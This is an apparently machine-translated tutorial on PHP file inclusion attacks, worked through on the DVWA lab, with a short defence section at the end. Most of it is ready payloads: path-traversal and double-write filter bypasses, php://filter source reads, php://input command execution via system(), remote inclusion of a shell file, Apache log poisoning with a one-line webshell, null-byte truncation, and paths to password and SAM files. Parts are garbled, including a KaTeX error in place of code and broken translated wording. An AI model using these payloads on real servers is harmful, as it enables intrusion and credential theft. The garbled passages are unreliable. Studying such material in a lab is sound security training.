File contains vulnerabilities:
theory:
File contains: When
writing a program, write the repeatedly used functions into a single file. When using these functions, you can directly call this file without writing again. This process of calling files is called include
File inclusion vulnerabilities:
Developers want the code to be more flexible, so the included files will be set as variables for dynamic calls.
The reason for the file inclusion vulnerability is that when the function introduces the file through the variable, it does not perform a reasonable verification of the incoming file name, thereby operating an unexpected file, which leads to accidental file leakage and even malicious code injection.
File include function:
The function of file include in PHP:
include() only a warning is generated when the included file is not found.
include_once() is similar to include(), the difference is that if the code in the file has been included, it will not be repeated Including
require() will generate a fatal error when the included file cannot be found. The script stops running.
require_once() is similar to require(), except that when the code in the file is already included, it will not be included again
The file provided by jsp\servlet contains the function
ava.io.file()
java.io.filereader()
The file include function
include_file
include_virtual provided in asp
File inclusion vulnerability classification:
local file inclusion: the
included file is stored on the local server
Remote file inclusion: The
included file is stored on a third-party server. The
condition is: allow_url_fopen = on
File contains vulnerability detection:
There are page features that contain vulnerabilities:
?page=a.php
?home=b.html
?file=content
Classic test method:
?file=…/…/…/etc/passwd
?page=file:/ //etc/passwd
?pade=http://www.f_In.cn/1.php
Examples:
1. File contains vulnerability examples (Windows) Elementary
Enter dvwa and set the security level to low
Click on file inclusion to enter the test page
Add /etc/passwd after the URL address, by returning to the page, you can determine that the system is Windows, and get the absolute path of the server file
Absolute path access,
add specific commands after the url as follows to obtain PHP file information
D:\phpstudy\www\dvwa\php.ini
Relative path access:
Enter the relative path of the file in the url address to obtain the PHP file information. The specific command is as follows:
where .../ is the cyclotron, and returns to the system root directory.
…/…/…/…/…/ phpstudy\www\dvwa\php.ini
In order to increase the concealment, the \phpstudy\www\dvwa\php.ini is encoded and then accessed
The remote file contains
Create the file phpinfo.txt and place it on the third-party server
Enter the external link in the url address to get the relevant php file information
HTTP: //192.168.1.10/phpinfo.txt
where the IP address is the IP address of the third-party server
Encode HTTP: //192.168.1.10/phpinfo.txt for access
2. The file contains the vulnerability instance (Windows) Intermediate
Enter dvwa and set the security level to medium
Click on file inclusion to enter the test page
Add /etc/passwd after the URL address. By returning to the page, you can determine that the system is Windows and obtain the absolute path of the server file D:\phpstudy\www\dvwa
Absolute path access,
add specific commands after the url as follows to obtain PHP file information
D:\phpstudy\www\dvwa\php.ini
Check the source code and find that the server uses the str_replace() function to filter .../ …\ http https
For relative path access, use double writing to bypass,
…/./…/./…/./…/./…/./phpstudy/www/dvwa/php.ini
The remote file contains
Create the file phpinfo.txt and place it on the third-party server
Enter the external link in the url address and use the substitution rule of double writing bypass to obtain the relevant php file information
hthttp://tp://192.168.1.10/phpinfo.txt
3. File contains vulnerability instance three (Windows) advanced
Enter dvwa and set the security level to high
Click on file inclusion to enter the test page
Add /etc/passwd after the URL address, check the results and find an error
Looking at the source code, it is found that the server uses the fnmatch() function to check the page parameter. The page parameter must be at the beginning of file, so that the server will contain the corresponding file.
Add file:///etc/passwd after the url address, check the return result, the system is Windows and find the web file path
Absolute access path:
enter the following parameters in the address to obtain the php file information
file:///D:\phpstudy\www\dvwa\php.ini
Relative path access
file:///...\phpstudy\www\dvwa\php.ini
4. The file contains vulnerability examples four (Linux) elementary
The security level of the dvwa platform (based on Linux) is low
Enter dvwa and set the security level to low
Click on file inclusion to enter the test page
Add /etc/passwd after the URL address, and get the passwd file information of the system where the platform is located by returning the page result
Relative path access:
Enter the relative path of the file in the url address to obtain the passwd file information. The specific command is as follows:
where .../ is the cyclotron and returns to the system root directory.
…/…/…/…/…/Etc/passwd
In order to increase the concealment, the /etc/passwd is encoded and then accessed
The remote file contains
Create the file phpinfo.txt and place it on the third-party server
Enter the external link in the url address to get the relevant php file information
HTTP: //192.168.1.10/phpinfo.txt
where the IP address is the IP address of the third-party server
Encode HTTP: //192.168.1.10/phpinfo.txt for access
5. The file contains vulnerability instance four (Linux) Intermediate
Enter dvwa and set the security level to medium
Click on file inclusion to enter the test page
Looking at the source code, it is found that the server uses the str_replace() function to filter .../ …\ http https.
Add /etc/passwd after the URL address, and obtain the passwd file information of the system where the platform is located by returning to the page
For relative path access, use double writing to bypass,
…/./…/./…/./…/./…/./etc/passwd
The remote file contains
Create the file phpinfo.txt and place it on the third-party server
Enter the external link in the url address and use the substitution rule of double writing bypass to obtain the relevant php file information
hthttp://tp://192.168.1.10/phpinfo.txt
6. File contains vulnerability example three (linux) advanced
Enter dvwa and set the security level to high
Click on file inclusion to enter the test page
Add /etc/passwd after the URL address, check the results and find an error
Looking at the source code, it is found that the server uses the fnmatch() function to check the page parameter. The page parameter must be at the beginning of file, so that the server will contain the corresponding file.
Add file:///etc/passwd after the url address, view the returned result, and get the passwd file information of the system where the platform is located
Relative path access
file:///…/…/…/…/…/etc/passwd
7. The middleware log contains bypass instances:
When a PHP file has only local inclusion vulnerabilities and no remote inclusion vulnerabilities, but normal files cannot be uploaded (without upload function), this means that there are inclusion vulnerabilities but cannot be exploited. At this time, the attacker may Use apache log files to invade.
After the Apache server is running, two log files will be generated. These two files are access.log (access log) and error.log (error log). The apache log file records our operations and writes to the access log file access. in the log
Experiment:
In dvwa: The security level is set to low.
At this time, a word of Trojan horse will be written into the access.log access log.
Method: Copy a word of Trojan horse in the chopper and connect to the URL address. After execution, the log will record the next sentence
Although the Trojan will report an error, a word of Trojan has been recorded in the log.
At this point, just use the local include file to execute access.log.
Note that you can use .../ to adjust the directory.
8.php contains read and write files
1.php contains read files:
Experimental environment dvwa, security level low
The condition is to know the name and path of this file
Open the proxy in the browser, open burp and construct the URL in the browser to perform packet capture
http://192.168.1.55:8080/dvwa/vulnerabilities/fi/?page=php://filter/read=convert.base64- The function of encode/resource=x.php
is to access the URL, modify the parameters of the function, and then get the base64-encrypted string through the php protocol (php://filter/read)
and then decrypt it to get the PHP data Content
2.php contains writing files to
construct URL
http://192.168.1.55:8080/dvwa/vulnerabilities/fi/?page=php://input
And the post data submitted by burp is: <?php system('net user');?> Use php language, system function, and execute net user
function. Many other functions that can execute commands can also be used here.
It can be used only when allow_url_include is on. If you want to view the echo result, you must find php-apache2handler.ini under C:\php\php-5.2.14-Win32 and open it, and search for display_funtions=proc-open,oppen, exec,system……. Delete system and restart apache.
The file contains a summary of the vulnerability bypass methods
- The str_replace function bypasses the
DVWA in the experimental environment. The security level medium
programmers will use the str_replace function for defense. This function is extremely insecure, because you can easily bypass the replacement rule using double writing,
such as page=hthttp://tp:/ /192.168.0.103/phpinfo.txt, the str_replace function will delete http://, so page=http://192.168.0.103/phpinfo.txt, the remote command is successfully executed.
Note that because only ".../" and "...\" are replaced, there is no restriction on including files using absolute paths.
Experiment:
1. The local file contains
http://192.168.0.103/dvwa/vulnerabilities/fi/page=…/./…/./…/./…/./…/./…/./…/. /..././..././..././Xampp/htdocs/dvwa/php.ini
2. The absolute path is not affected in any way
http://192.168.0.103/dvwa/vulnerabilities/fi/page=C:/xampp /htdocs/dvwa/php.ini
3. The remote file contains
http://192.168.0.103/dvwa/vulnerabilities/fi/page=htthttp://p://192.168.5.12/phpinfo.txt
2. Include truncation bypass
analysis code:
<?php
if(isset($_GET['page'])){ include $_GET['page'] .".php"; }else{ include'home.php'; } ?> Determine whether the parameter is assigned. If assigned, include the parameter variable and add ``.php'' for defense. If there is no assignment, include home.php. This method is only suitable for magic_quotes_gpc=off, the php version If it is less than 5.3.4, it can be bypassed by the %00 truncation, but it is hard to see now, for example: index.php?file=info.txt//…………over a certain amount of data/.
3. The fnmatch function bypasses
Code analysis:
if(!fnmatch("file*", KaTeX parse error: Expected'EOF', got'&' at position 6: file)&̲& file!="include.php")
when the file An error occurs when it is neither "include.php" (including the include.php file) nor "file*" (the beginning of the file name file), and vice versa, if the file name meets one of the conditions.
At this time, the first condition is difficult to meet, so we shifted our attention to reaching the second vulnerability
page=file:///C:/xampp/htdocs/dvwa/php.ini just meets "file*" (file name file beginning)
Construct the url
http://192.168.0.103/dvwa/vulnerabilities/fi/page=file:///C:/xampp/htdocs/dvwa/php.ini
successfully read the server configuration file
using the php file protocol
4. Impossible difficulty code analysis
if (!= "include.php"&&$ file! "File1.php" &&"file2.php")
He uses the method of adding a whitelist to stipulate that the parameters can only be file1.php, file2.php
Use
1. File contains vulnerability exploits:
1. File contains commonly used methods of exploitation:
read sensitive information,
local containment and file upload
use php encapsulation protocol
apache log file
remote containment write shell
truncated containment
2. Reading sensitive information The
commonly used method
is to add the file name of the target host after the URL address. If the file exists on the target host and the user has the corresponding permissions, the content of the file can be read. Otherwise, you will get a warning similar to open_based restriction in effect
Common sensitive information file path
Windows system
C:\boot.ini//View the system version
C:\windows\repair\sam//store the password for the first installation of the Windows system
C:\porgram files\mysql\my.ini//store MySQL configuration
Linux system
/etc/passwd
/etc/local/app/apache2/conf/httpd.conf //apache configuration file
/etc/my.cnf //mysql configuration file
3. Local inclusion and file uploading.
Under the condition that the website provides file upload function, the shell can still be taken down with file inclusion vulnerabilities.
4. The remote include write shell
condition is allow_url_fopen=on
Write the shell.txt file in the remote server.
After the url parameter, connect the third-party server address and the file name shell.txt inside
5.php encapsulation protocol
Use php://filter to read the source code of php files
Use encapsulation protocol php://inpput for code execution
6.Apache log file The
condition is that the current account has the right to log file.
Method: Use packet capture software to add malicious code to the url, and then use the file inclusion vulnerability to include the log file. Finding the path of apache is the key
7. Truncate includes
Method: %00 (null)
Use the operating system to limit the maximum length of the directory
If there is a picture Trojan at this time,
enter http://www.f_i.cn/index.php?page=1.jpg%00
This method is only applicable when majic_quotes_gpc=off
File contains vulnerability defense
Strictly judge whether the included parameters are externally controllable
Path restriction: restrict the included files to only a certain folder, and you must prohibit directory jump characters such as.../
Include file verification: verify whether the included file is a member of the whitelist
Try not to use dynamic inclusion, you can write it on the page that needs to be included